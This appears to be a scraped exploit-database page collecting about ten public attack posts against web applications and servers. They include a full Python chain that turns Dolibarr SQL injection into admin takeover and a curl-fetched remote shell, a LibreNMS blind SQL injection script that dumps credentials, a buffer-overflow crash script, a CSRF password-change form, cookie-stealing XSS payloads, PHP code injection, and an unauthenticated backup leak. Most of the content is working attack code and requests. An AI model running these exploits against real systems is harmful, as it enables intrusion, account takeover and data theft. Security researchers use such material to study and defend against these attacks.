HireHackking

# Exploit Title: Dolibarr 12.0.3 - SQLi to RCE # Date: 2/12/2020 # Exploit Author: coiffeur # Write Up: https://therealcoiffeur.github.io/c10010, https://therealcoiffeur.github.io/c10011 # Vendor Homepage: https://www.dolibarr.org/ # Software Link: https://www.dolibarr.org/downloads.php, https://sourceforge.net/projects/dolibarr/files/Dolibarr%20ERP-CRM/12.0.3/ # Version: 12.0.3 import argparse import binascii import random import re from io import BytesIO from urllib.parse import quote_plus as qp import bcrypt import pytesseract import requests from bs4 import BeautifulSoup from PIL import Image DELTA = None DEBUG = 1 SESSION = requests.session() TRESHOLD = 0.80 DELAY = 1 LIKE = "%_subscription" COLUMNS = ["login", "pass_temp"] def usage(): banner = """NAME: Dolibarr SQLi to RCE (authenticate) SYNOPSIS: python3 sqli_to_rce_12.0.3.py -t <BASE_URL> -u <USERNAME> -p <PAS= SWORD> EXAMPLE: python3 sqli_to_rce_12.0.3.py -t "http://127.0.0.1/projects/dolibarr/12= .0.3/htdocs/" -u test -p test AUTHOR: coiffeur """ print(banner) exit(-1) def hex(text): return "0x" + binascii.hexlify(text.encode()).decode() def hash(password): salt = bcrypt.gensalt() hashed = bcrypt.hashpw(password.encode(), salt) return hashed.decode() def authenticate(url, username, password): datas = { "actionlogin": "login", "loginfunction": "loginfunction", "username": username, "password": password } r = SESSION.post(f"{url}index.php", data=datas, allow_redirects=False, verify=False) if r.status_code != 302: if DEBUG: print(f"[x] Authentication failed!") return 0 if DEBUG: print(f" [*] Authenticated as: {username}") return 1 def get_antispam_code(base_url): code = "" while len(code) != 5: r = SESSION.get(f"{base_url}core/antispamimage.php", verify=False) temp_image = f"/tmp/{random.randint(0000,9999)}" with open(temp_image, "wb") as f: f.write(r.content) with open(temp_image, "rb") as f: code = pytesseract.image_to_string( Image.open(BytesIO(f.read()))).split("\n")[0] for char in code: if char not in "aAbBCDeEFgGhHJKLmMnNpPqQRsStTuVwWXYZz2345679": code = "" break return code def reset_password(url, login): for _ in range(5): code = get_antispam_code(url) headers = { "Referer": f"{url}user/passwordforgotten.php" } datas = { "action": "buildnewpassword", "username": login, "code": code } r = SESSION.post(url=f"{url}user/passwordforgotten.php", data=datas, headers=headers, verify=False) if r.status_code == 200: for response in [f"Request to change password for {login} sent = to", f"Demande de changement de mot de passe pour {login} envoy=C3=A9e"]: if r.text.find(response): if DEBUG: print(f" [*] Password reset using code: {code}") return 1 return 0 def change_password(url, login, pass_temp): r = requests.get(url=f"{url}user/passwordforgotten.php?action=val= idatenewpassword&username={qp(login)}&passwordhash={hash(pass_temp)}", allow_redirects=False, verify=False) if r.status_code == 302: if DEBUG: print(f" [*] Password changed: {pass_temp}") return 1 return 0 def change_binary(url, command, parameters): headers = { "Referer": f"{url}admin/security_file.php" } datas = { "action": "updateform", "MAIN_UPLOAD_DOC": "2048", "MAIN_UMASK": "0664", "MAIN_ANTIVIRUS_COMMAND": command, "MAIN_ANTIVIRUS_PARAM": parameters } r = SESSION.post(url=f"{url}admin/security_file.php", data=datas, headers=headers, verify=False) if r.status_code == 200: for response in ["Record modified successfully", "Enregistrement mo= difi=C3=A9 avec succ=C3=A8s"]: if response in r.text: if DEBUG: print(f" [*] Binary's path changed") return 1 return 0 def trigger_exploit(url): headers = { "Referer": f"{url}admin/security_file.php" } files = { "userfile[]": open("junk.txt", "rb"), } datas = { "sendit": "Upload" } if DEBUG: print(f" [*] Triggering reverse shell") r = SESSION.post(url=f"{url}admin/security_file.php", files=files, data=datas, headers=headers, verify=False) if r.status_code == 200: for response in ["File(s) uploaded successfully", "The antivirus pr= ogram was not able to validate the file (file might be infected by a virus)= ", "Fichier(s) t=C3=A9l=C3=A9vers=C3=A9s(s) avec succ=C3=A8s", "L'antivirus= n'a pas pu valider ce fichier (il est probablement infect=C3=A9 par un vir= us) !"]: if response in r.text: if DEBUG: print(f" [*] Exploit done") return 1 return 0 def get_version(url): r = SESSION.get(f"{url}index.php", verify=False) x = re.findall( r"Version Dolibarr [0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}", r.text) if x: version = x[0] if "12.0.3" in version: if DEBUG: print(f" [*] {version} (exploit should work)") return 1 if DEBUG: print(f"[*] Version may not be vulnerable") return 0 def get_privileges(url): r = SESSION.get(f"{url}index.php", verify=False) x = re.findall(r"id=\d", r.text) if x: id = x[0] if DEBUG: print(f" [*] id found: {id}") r = SESSION.get(f"{url}user/perms.php?{id}", verify=False) soup = BeautifulSoup(r.text, 'html.parser') for img in soup.find_all("img"): if img.get("title") in ["Actif", "Active"]: for td in img.parent.parent.find_all("td"): privileges = [ "Consulter les commandes clients", "Read customers = orders"] for privilege in privileges: if privilege in td: if DEBUG: print( f" [*] Check privileges: {privilege}= ") return 1 if DEBUG: print(f"[*] At the sight of the privileges, the exploit may fail") return 0 def check(url, payload): headers = { "Referer": f"{url}commande/stats/index.php?leftmenu=orders" } datas = {"object_status": payload} r = SESSION.post(url=f"{url}commande/stats/index.php", data=datas, headers=headers, verify=False) return r.elapsed.total_seconds() def evaluate_delay(url): global DELTA deltas = [] payload = f"IF(0<1, SLEEP({DELAY}), SLEEP(0))" for _ in range(4): deltas.append(check(url, payload)) DELTA = sum(deltas)/len(deltas) if DEBUG: print(f" [+] Delta: {DELTA}") def get_tbl_name_len(url): i = 0 while 1: payload = f"IF((SELECT LENGTH(table_name) FROM information_schema= .tables WHERE table_name LIKE {hex(LIKE)})>{i}, SLEEP(0), SLEEP({DELAY}))" if check(url, payload) >= DELTA*TRESHOLD: return i if i > 100: print(f"[x] Exploit failed") exit(-1) i += 1 def get_tbl_name(url, length): tbl_name = "" for i in range(1, length+1): min, max = 0, 127-1 while min < max: mid = (max + min) // 2 payload = f"IF((SELECT ASCII(SUBSTR(table_name,{i},1)) FROM i= nformation_schema.tables WHERE table_name LIKE {hex(LIKE)})<={mid}, SLEEP= ({DELAY}), SLEEP(0))" if check(url, payload) >= DELTA*TRESHOLD: max = mid else: min = mid + 1 tbl_name += chr(min) return tbl_name def get_elt_len(url, tbl_name, column_name): i = 0 while 1: payload = f"IF((SELECT LENGTH({column_name}) FROM {tbl_name} LIMI= T 1)>{i}, SLEEP(0), SLEEP({DELAY}))" if check(url, payload) >= DELTA*TRESHOLD: return i if i > 100: print(f"[x] Exploit failed") exit(-1) i += 1 def get_elt(url, tbl_name, column_name, length): elt = "" for i in range(1, length+1): min, max = 0, 127-1 while min < max: mid = (max + min) // 2 payload = f"IF((SELECT ASCII(SUBSTR({column_name},{i},1)) FRO= M {tbl_name} LIMIT 1)<={mid} , SLEEP({DELAY}), SLEEP(0))" if check(url, payload) >= DELTA*TRESHOLD: max = mid else: min = mid + 1 elt += chr(min) return elt def get_row(url, tbl_name): print(f" [*] Dump admin's infos from {tbl_name}") infos = {} for column_name in COLUMNS: elt_length = get_elt_len(url, tbl_name, column_name) infos[column_name] = get_elt(url, tbl_name, column_name, elt_leng= th) if DEBUG: print(f" [+] Infos: {infos}") return infos def main(url, username, password): # Check if exploit is possible print(f"[*] Requirements:") if not authenticate(url, username, password): print(f"[x] Exploit failed!") exit(-1) get_version(url) get_privileges(url) print(f"\n[*] Starting exploit:") # Evaluate delay evaluate_delay(url) print(f" [*] Extract prefix (using table: {LIKE})") tbl_name_len = get_tbl_name_len(url) tbl_name = get_tbl_name(url, tbl_name_len) prefix = f"{tbl_name.split('_')[0]}_" if DEBUG: print(f" [+] Prefix: {prefix}") # Dump admin's infos user_table_name = f"{prefix}user" infos = get_row(url, user_table_name) if not infos["login"]: print(f"[x] Exploit failed!") exit(-1) # Reset admin's passworrd if DEBUG: print(f" [*] Reseting {infos['login']}'s password") if not reset_password(url, infos["login"]): print(f"[x] Exploit failed!") exit(-1) infos = get_row(url, user_table_name) # Remove cookies to logout # Change admin's password # Login as admin SESSION.cookies.clear() if not change_password(url, infos['login'], infos['pass_temp']): print(f"[x] Exploit failed!") exit(-1) authenticate(url, infos['login'], infos['pass_temp']) # Change antivirus's binary path # Trigger reverse shell change_binary(url, "bash", '-c "$(curl http://127.0.0.1:8000/poc.txt)"'= ) trigger_exploit(url) return 0 if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument("-t", help="Base URL of Dolibarr") parser.add_argument("-u", help="Username") parser.add_argument("-p", help="Password") args = parser.parse_args() if not args.t or not args.u or not args.p: usage() main(args.t, args.u, args.p)

# Exploit Title: Courier Management System 1.0 - 'MULTIPART street ' SQL Injection # Exploit Author: Zhaiyi (Zeo) # Date: 2020-12-11 # Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code # Affected Version: Version 1 # Category: Web Application Step 1. Log into application with credentials Step 2. Click on Branch Step 3. Select New Branch http://127.0.0.1/index.php?page=new_branch Step 4. Fill the form , click on save Step 5. Capture the request of the ""/ajax.php?action=save_branch"" page in burpsute Step 6. Save request and run sqlmap on request file using command " sqlmap -r request --time-sec=5 --dbs " Step 7. This will inject successfully and you will have an information disclosure of all databases contents --- Parameter: MULTIPART street ((custom) POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: -----------------------------12317926718649295872939507245 Content-Disposition: form-data; name="id" -----------------------------12317926718649295872939507245 Content-Disposition: form-data; name="street" 11111111111' AND (SELECT 8687 FROM (SELECT(SLEEP(5)))XZFt) AND 'OQNu'='OQNu -----------------------------12317926718649295872939507245 Content-Disposition: form-data; name="city" 111111111 -----------------------------12317926718649295872939507245 Content-Disposition: form-data; name="state" 1111111111 -----------------------------12317926718649295872939507245 Content-Disposition: form-data; name="zip_code" 11111111111111 -----------------------------12317926718649295872939507245 Content-Disposition: form-data; name="country" 1111111111111 -----------------------------12317926718649295872939507245 Content-Disposition: form-data; name="contact" 111111111 -----------------------------12317926718649295872939507245-- ---

# Exploit Title: LibreNMS 1.46 - MAC Accounting Graph Authenticated SQL Injection # Google Dork: Unknown # Date: 13-12-2020 # Exploit Author: Hodorsec # Vendor Homepage: https://www.librenms.org # Software Link: https://github.com/librenms/librenms # Update notice: https://community.librenms.org/t/v1-69-october-2020-info/13838 # Version: 1.46 # Tested on: Debian 10, PHP 7, LibreNMS 1.46; although newer version might be affected until 1.69 patch # CVE : N/A #!/usr/bin/python3 # EXAMPLE: # $ python3 poc_librenms-1.46_auth_sqli_timed.py librenms D32fwefwef http://192.168.252.14 2 # [*] Checking if authentication for page is required... # [*] Visiting page to retrieve initial token and cookies... # [*] Retrieving authenticated cookie... # [*] Printing number of rows in table... # 1 # [*] Found 1 rows of data in table 'users' # # [*] Retrieving 1 rows of data using 'username' as column and 'users' as table... # [*] Extracting strings from row 1... # librenms # [*] Retrieved value 'librenKs' for column 'username' in row 1 # [*] Retrieving 1 rows of data using 'password' as column and 'users' as table... # [*] Extracting strings from row 1... # $2y$10$pAB/lLNoT8wx6IedB3Hnpu./QMBqN9MsqJUcBy7bsr # [*] Retrieved value '$2y$10$pAB/lLNoT8wx6IedB3Hnpu./QMBqN9MsqJUcBy7bsr' for column 'password' in row 1 # # [+] Done! import requests import urllib3 import os import sys import re from bs4 import BeautifulSoup # Optionally, use a proxy # proxy = "http://<user>:<pass>@<proxy>:<port>" proxy = "" os.environ['http_proxy'] = proxy os.environ['HTTP_PROXY'] = proxy os.environ['https_proxy'] = proxy os.environ['HTTPS_PROXY'] = proxy # Disable cert warnings urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # Set timeout timeout = 10 # Injection prefix and suffix inj_prefix = "(select(sleep(" inj_suffix = ")))))" # Decimal begin and end dec_begin = 48 dec_end = 57 # ASCII char begin and end ascii_begin = 32 ascii_end = 126 # Handle CTRL-C def keyboard_interrupt(): """Handles keyboardinterrupt exceptions""" print("\n\n[*] User requested an interrupt, exiting...") exit(0) # Custom headers def http_headers(): headers = { 'User-Agent': 'Mozilla', } return headers def check_auth(url,headers): print("[*] Checking if authentication for page is required...") target = url + "/graph.php" r = requests.get(target,headers=headers,timeout=timeout,verify=False) if "Unauthorized" in r.text: return True else: return False def get_initial_token_and_cookies(url,headers): print("[*] Visiting page to retrieve initial token and cookies...") target = url + "/login" r = requests.get(target,headers=headers,timeout=timeout,verify=False) soup = BeautifulSoup(r.text,'html.parser') for n in soup('input'): if n['name'] == "_token": token = n['value'] return token,r.cookies else: return None,r.cookies def get_valid_cookie(url,headers,token,cookies,usern,passw): print("[*] Retrieving authenticated cookie...") appl_cookie = "laravel_session" post_data = {'_token':token, 'username':usern, 'password':passw, 'submit':''} target = url + "/login" r = requests.post(target,data=post_data,headers=headers,cookies=cookies,timeout=timeout,verify=False) res = r.text if "Overview | LibreNMS" in res: return r.cookies else: print("[!] No valid response from used session, exiting!\n") exit(-1) # Perform the SQLi call for injection def sqli(url,headers,cookies,inj_str,sleep): comment_inj_str = re.sub(" ","/**/",inj_str) inj_params = {'id':'1', 'stat':'none', 'type':'port_mac_acc_total', 'sort':comment_inj_str, 'debug':'1'} inj_params_unencoded = "&".join("%s=%s" % (k,v) for k,v in inj_params.items()) # Do GET request r = requests.get(url,params=inj_params_unencoded,headers=headers,cookies=cookies,timeout=timeout,verify=False) res = r.elapsed.total_seconds() if res >= sleep: return True elif res < sleep: return False else: print("[!] Something went wrong checking responses. Check responses manually. Exiting.") exit(-1) # Extract rows def get_rows(url,headers,cookies,table,sleep): rows = "" max_pos_rows = 4 # Get number maximum positional characters of rows: e.g. 1096,2122,1234,etc. for pos in range(1,max_pos_rows+1): # Test if current pos does have any valid value. If not, break direction = ">" inj_str = inj_prefix + str(sleep) + "-(if(ORD(MID((select IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM " + table + ")," + str(pos) + ",1))" + direction + "1,0," + str(sleep) + inj_suffix if not sqli(url,headers,cookies,inj_str,sleep): break # Loop decimals direction = "=" for num_rows in range(dec_begin,dec_end+1): row_char = chr(num_rows) inj_str = inj_prefix + str(sleep) + "-(if(ORD(MID((select IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM " + table + ")," + str(pos) + ",1))"=+ direction + str(num_rows) + ",0," + str(sleep) + inj_suffix if sqli(url,headers,cookies,inj_str,sleep): rows += row_char print(row_char,end='',flush=True) break if rows != "": print("\n[*] Found " + rows + " rows of data in table '" + table + "'\n") return int(rows) else: return False # Loop through positions and characters def get_data(url,headers,cookies,row,column,table,sleep): extracted = "" max_pos_len = 50 # Loop through length of string # Not very efficient, should use a guessing algorithm print("[*] Extracting strings from row " + str(row+1) + "...") for pos in range(1,max_pos_len): # Test if current pos does have any valid value. If not, break direction = ">" inj_str = inj_prefix + str(sleep) + "-(if(ord(mid((select ifnull(cast(" + column + " as NCHAR),0x20) from " + table + " LIMIT " + str(row) += ",1)," + str(pos) + ",1))" + direction + str(ascii_begin) + ",0," + str(sleep) + inj_suffix if not sqli(url,headers,cookies,inj_str,sleep): break # Loop through ASCII printable characters direction = "=" for guess in range(ascii_begin,ascii_end+1): extracted_char = chr(guess) inj_str = inj_prefix + str(sleep) + "-(if(ord(mid((select ifnull(cast(" + column + " as NCHAR),0x20) from " + table + " LIMIT " + str(row) + ",1)," + str(pos) + ",1))" + direction + str(guess) + ",0," + str(sleep) + inj_suffix if sqli(url,headers,cookies,inj_str,sleep): extracted += chr(guess) print(extracted_char,end='',flush=True) break return extracted # Main def main(argv): if len(sys.argv) == 5: usern = sys.argv[1] passw = sys.argv[2] url = sys.argv[3] sleep = int(sys.argv[4]) else: print("[*] Usage: " + sys.argv[0] + " <username> <password> <url> <sleep_in_seconds>\n") exit(0) # Random headers headers = http_headers() # Do stuff try: # Get a valid initial token and cookies token,cookies = get_initial_token_and_cookies(url,headers) # Check if authentication is required auth_required = check_auth(url,headers) if auth_required: # Get an authenticated session cookie using credentials valid_cookies = get_valid_cookie(url,headers,token,cookies,usern,passw) else: valid_cookies = cookies print("[+] Authentication not required, continue without authentication...") # Setting the correct vulnerable page url = url + "/graph.php" # The columns to retrieve columns = ['username','password'] # The table to retrieve data from table = "users" # Getting rows print("[*] Printing number of rows in table...") rows = get_rows(url,headers,valid_cookies,table,sleep) if not rows: print("[!] Unable to retrieve rows, checks requests.\n") exit(-1) # Getting values for found rows in specified columns for column in columns: print("[*] Retrieving " + str(rows) + " rows of data using '" + column + "' as column and '" + table + "' as table...") for row in range(0,rows): # rowval_len = get_length(url,headers,row,column,table) retrieved = get_data(url,headers,valid_cookies,row,column,table,sleep) print("\n[*] Retrieved value '" + retrieved + "' for column'" + column + "' in row " + str(row+1)) # Done print("\n[+] Done!\n") except requests.exceptions.Timeout: print("[!] Timeout error\n") exit(-1) except requests.exceptions.TooManyRedirects: print("[!] Too many redirects\n") exit(-1) except requests.exceptions.ConnectionError: print("[!] Not able to connect to URL\n") exit(-1) except requests.exceptions.RequestException as e: print("[!] " + str(e)) exit(-1) except requests.exceptions.HTTPError as e: print("[!] Failed with error code - " + str(e.code) + "\n") exit(-1) except KeyboardInterrupt: keyboard_interrupt() exit(-1) # If we were called as a program, go execute the main function. if __name__ == "__main__": main(sys.argv[1:])

# Exploit Title: Rukovoditel 2.6.1 - Cross-Site Request Forgery (Change password) # Date: 2020-12-14 # Exploit Author: KeopssGroup0day,Inc # Vendor Homepage: https://www.rukovoditel.net/ # Software Link: https://www.rukovoditel.net/download.php # Version: v2.6.1 # Tested on: Kali Linux POC(localhost/index.php?module=users/change_password): <html> <!-- CSRF PoC --> <body> <script>history.pushState('', '', '/')</script> <form action="https://localhost/index.php?module=users/change_password&action=change" method="POST"> <input type="hidden" name="form&#95;session&#95;token" value="D&#94;HUyTDh0X" /> <input type="hidden" name="password&#95;new" value="123456789" /> <input type="hidden" name="password&#95;confirmation" value="123456789" /> <input type="submit" value="Submit request" /> </form> </body> </html> --

# Exploit Title: Jenkins 2.235.3 - 'X-Forwarded-For' Stored XSS # Date: 11/12/2020 # Exploit Author: gx1 # Vendor Homepage: https://www.jenkins.io/ # Software Link: https://updates.jenkins-ci.org/download/war/ # Version: <= 2.251 and <= LTS 2.235.3 # Tested on: any # CVE : CVE-2020-2231 # References: https://www.jenkins.io/security/advisory/2020-08-12/#SECURITY-1955 https://www.openwall.com/lists/oss-security/2020/08/12/4 Vendor Description: Jenkins 2.251 and earlier, LTS 2.235.3 and earlier does not escape the remote address of the host starting a build via 'Trigger builds remotely'. This results in a stored cross-site scripting (XSS) vulnerability exploitable by users with Job/Configure permission or knowledge of the Authentication Token. Jenkins 2.252, LTS 2.235.4 escapes the remote address of the host. Technical Details and Exploitation: When a build of a project is completed, Jenkins returns a message in completed build process. Build process is present in build history view. The message reflects the username, for example "Started by user gx1". Anyway, when 'Trigger builds remotely feature' is enabled, instead of the username the remote client IP is reflected, i.e.: Started by remote host '<client-ip-address>'. To understand how remote build trigger works, have a look at this post: https://narenchejara.medium.com/trigger-jenkins-job-remotely-using-jenkins-api-20973618a493 The message "Starte by remote <client-ip-address> is not escaped. This could seem without security issues because the user cannot change the remote IP, right? This is not completely true... when the application server is behind a proxy, "remote client IP" is not available, as the request comes from the proxy. In these cases, X-Headers are used to allow the application server to understand the real client information. A common header is X-Forwarded-For: X-Forwarded-For HTTP header is inserted by load balancers into the data stream to identify the address of the connecting client system. To exploit the vulnerability the attacker requires several conditions: - Remote build should be enabled and if needed the attackers should have obtained API authentication token or should have Job/Configure permission - Application server that hosts Jenkins should use some X-Header to override client IP. This happens often, because usually the application server is under proxy, and in order to obtain client IP, override mechanisms are used. For example, in Apache Tomcat, it is possible to configure X-Forwarded-For heaer processing, as described in https://dacurry-tns.github.io/deploying-apereo-cas/setup_tomcat_configure-xforwardedfor-header-processing.html. Proof Of Concept: 1. Identify the X-Header that is used by the Application Server to override proxy ip. Let's suppose that "X-Forwarded-For" is used. In this condition, the attacker can inject malicious payloads in "X-Forwarded-For" header value to exploit the vulnerability; 2. Send the following request: GET /job/<project_name>/build?token=<token> HTTP/1.1 Host: <jenkins_host>:8080 X-Forwarded-For: gx1<script>alert(1);</script> Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: JSESSIONID=88DD2A6297E0E0FE9A59B310CA271715; screenResolution=1220x686 Connection: close HTTP/1.1 201 Cache-Control: private Expires: Thu, 01 Jan 1970 00:00:00 GMT X-Content-Type-Options: nosniff Location: http://<vulnenv>:8080/jenkins/queue/item/7/ Content-Length: 0 Date: Fri, 11 Dec 2020 17:04:06 GMT Connection: close <project_name> is the project that can be remotely built by using <token>. 3. To trigger the XSS, navigate the build item present in the build history when the build is finished. For example, if the build current finished process is #16, stored XSS is present in http://<jenkins_host>/job/<project_name>/16/ Solution: The following releases contain fixes for security vulnerabilities: * Jenkins 2.252 * Jenkins LTS 2.235.4

# Exploit Title: Courier Management System 1.0 - 'ref_no' SQL Injection # Exploit Author: Zhaiyi (Zeo) # Date: 2020-12-11 # Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code # Affected Version: Version 1 # Category: Web Application Step 1. Log into application with credentials Step 2. Click on Branch Step 3. Select New Branch http://127.0.0.1/index.php?page=new_branch Step 4. Fill the form , click on save Step 5. Capture the request of the ""/ajax.php?action=save_branch"" page inburpsute Step 6. Save request and run sqlmap on request file using command " sqlmap -r request --time-sec=5 --dbs " Step 7. This will inject successfully and you will have an information disclosure of all databases contents --- Parameter: ref_no (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: ref_no=123' AND (SELECT 5575 FROM (SELECT(SLEEP(5)))ngIo) AND 'knst'='knst ---

# Exploit Title: MiniWeb HTTP Server 0.8.19 - Buffer Overflow (PoC) # Date: 13.12.2020 # Exploit Author: securityforeveryone.com # Author Mail: hello[AT]securityforeveryone.com # Vendor Homepage: https://sourceforge.net/projects/miniweb/ # Software Link: https://sourceforge.net/projects/miniweb/files/miniweb/0.8/miniweb-win32-20130309.zip/download # Version: 0.8.19 # Tested on: Win7 x86 # Researchers: Security For Everyone Team - https://securityforeveryone.com ''' Description MiniWeb HTTP server 0.8.19 allows remote attackers to cause a denial of service (daemon crash) via a long name for the first parameter in a POST request. Exploitation The vulnerability is the first parameter's name of the POST request. Example: PARAM_NAME1=param_data1&param_name2=param_data2 if we send a lot of "A" characters to "PARAM_NAME1", the miniweb server will crash. About Security For Everyone Team We are a team that has been working on cyber security in the industry for a long time. In 2020, we created securityforeveyone.com where everyone can test their website security and get help to fix their vulnerabilities. We have many free tools that you can use here: https://securityforeveryone.com/free-tool-list ''' #!/usr/bin/python import socket import sys import struct if len(sys.argv) != 2 : print "[+] Usage : python exploit.py [VICTIM_IP]" exit(0) TCP_IP = sys.argv[1] TCP_PORT = 8000 xx = "A"*2038 #4085 http_req = "POST /index.html HTTP/1.1\r\n" http_req += "Host: 192.168.231.140\r\n" http_req += "From: header-data\r\n" http_req += "Content-Type: application/x-www-form-urlencoded\r\n\r\n" http_req += xx + "=param_data1&param_name2=param_data2" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((TCP_IP, TCP_PORT)) print "[+] Sending exploit payload..." s.send(http_req) s.close()

# Exploit Title: Seacms 11.1 - 'ip and weburl' Remote Command Execution # Date: 20201212 # Exploit Author: j5s # Vendor Homepage: https://www.seacms.net/ # Software Link: https://www.seacms.net/ # Version: 11.1 POST /SeaCMS111/5f9js3/admin_ip.php?action=set HTTP/1.1 Host: 192.168.137.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 36 Origin: http://192.168.137.139 Connection: close Referer: http://192.168.137.139/SeaCMS111/5f9js3/admin_ip.php Cookie: more=1; Hm_lvt_22c4c422b3e7b17729ce8b5817d54592=1607175396; PHPSESSID=t1gc019b35rrgmr1dg53gfje96; t00ls=e54285de394c4207cd521213cebab040; t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MzoicGhwIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D Upgrade-Insecure-Requests: 1 v=0&ip=+%22%3Bphpinfo%28%29%3B%2F%2F Vulnerable parameters：ip payload：";phpinfo();//

# Exploit Title: System Explorer 7.0.0 - 'SystemExplorerHelpService' Unquoted Service Path # Date: 2020-10-14 # Exploit Author: Mohammed Alshehri # Vendor Homepage: http://systemexplorer.net/ # Software Link: http://systemexplorer.net/download/SystemExplorerSetup.exe # Version: Version 7.0.0 # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763 # Service info: C:\Users\m507>sc qc SystemExplorerHelpService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: SystemExplorerHelpService TYPE : 20 WIN32_SHARE_PROCESS START_TYPE : 3 DEMAND_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : C:\Program Files (x86)\System Explorer\service\SystemExplorerService64.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : System Explorer Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\m507> # Exploit: This vulnerability could permit executing code during startup or reboot with the escalated privileges.

# Exploit Title: Seacms 11.1 - 'checkuser' Stored XSS # Date: 20201212 # Exploit Author: j5s # Vendor Homepage: https://www.seacms.net/ # Software Link: https://www.seacms.net/ # Version: 11.1 POST /SEACMS111/5f9js3/admin_safe.php?action=setting HTTP/1.1 Host: 192.168.137.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 97 Origin: http://192.168.137.139 Connection: close Referer: http://192.168.137.139/SEACMS111/5f9js3/admin_safe.php?action=setting Cookie: more=1; Hm_lvt_22c4c422b3e7b17729ce8b5817d54592=1607175396; PHPSESSID=t1gc019b35rrgmr1dg53gfje96; t00ls=e54285de394c4207cd521213cebab040; t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MDoiIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D Upgrade-Insecure-Requests: 1 checkuser=%22%3E%3CsCrIpT%3Ealert%281%29%3C%2FsCrIpT%3E&checkhta=on&btnsetting=%E6%8F%90%E4%BA%A4 Vulnerable parameters： checkuser payload："><ScRiPt>alert(document.cookie)</ScRiPt>

# Exploit Title: WordPress Plugin Total Upkeep 1.14.9 - Database and Files Backup Download # Google Dork: intitle:("Index of" AND "wp-content/plugins/boldgrid-backup/=") # Date: 2020-12-12 # Exploit Author: Wadeek # Vendor Homepage: https://www.boldgrid.com/ # Software Link: https://downloads.wordpress.org/plugin/boldgrid-backup.1.14.9.zip # Version: 1.14.9 # Tested on: BackBox Linux 1) 'readme.txt' file reveal the plugin version : -> GET /wp-content/plugins/boldgrid-backup/readme.txt Stable tag: 1.14.9 2) 'env-info.php' file reveals the following informations without authentication : -> GET /wp-content/plugins/boldgrid-backup/cli/env-info.php { [...], "php_uname":"Linux wordpress-server X.X.X-XX-generic #XX-Ubuntu [...] x= 86_64", "php_version":"7.X.X", "server_addr":"127.0.0.1", "server_name":"www.example.com", "server_protocol":"HTTP/1.1", "server_software":"Apache/2.X.XX (Ubuntu)", "uid":XX, "username":"www-data" } 3) 'restore-info.json' file reveals the name and location of the archive containing the backups without authentication : -> GET /wp-content/plugins/boldgrid-backup/cron/restore-info.json { [...] "filepath":"/wp-content/boldgrid_backup_[RANDOM]/boldgrid-backup-www.example.com_wordpress-[RANDOM]-[DATE]-XXXXXX.zip" [...] } --trekuen-71b82944-04b2-40f7-b2e2-d8de1b7f2bb8--

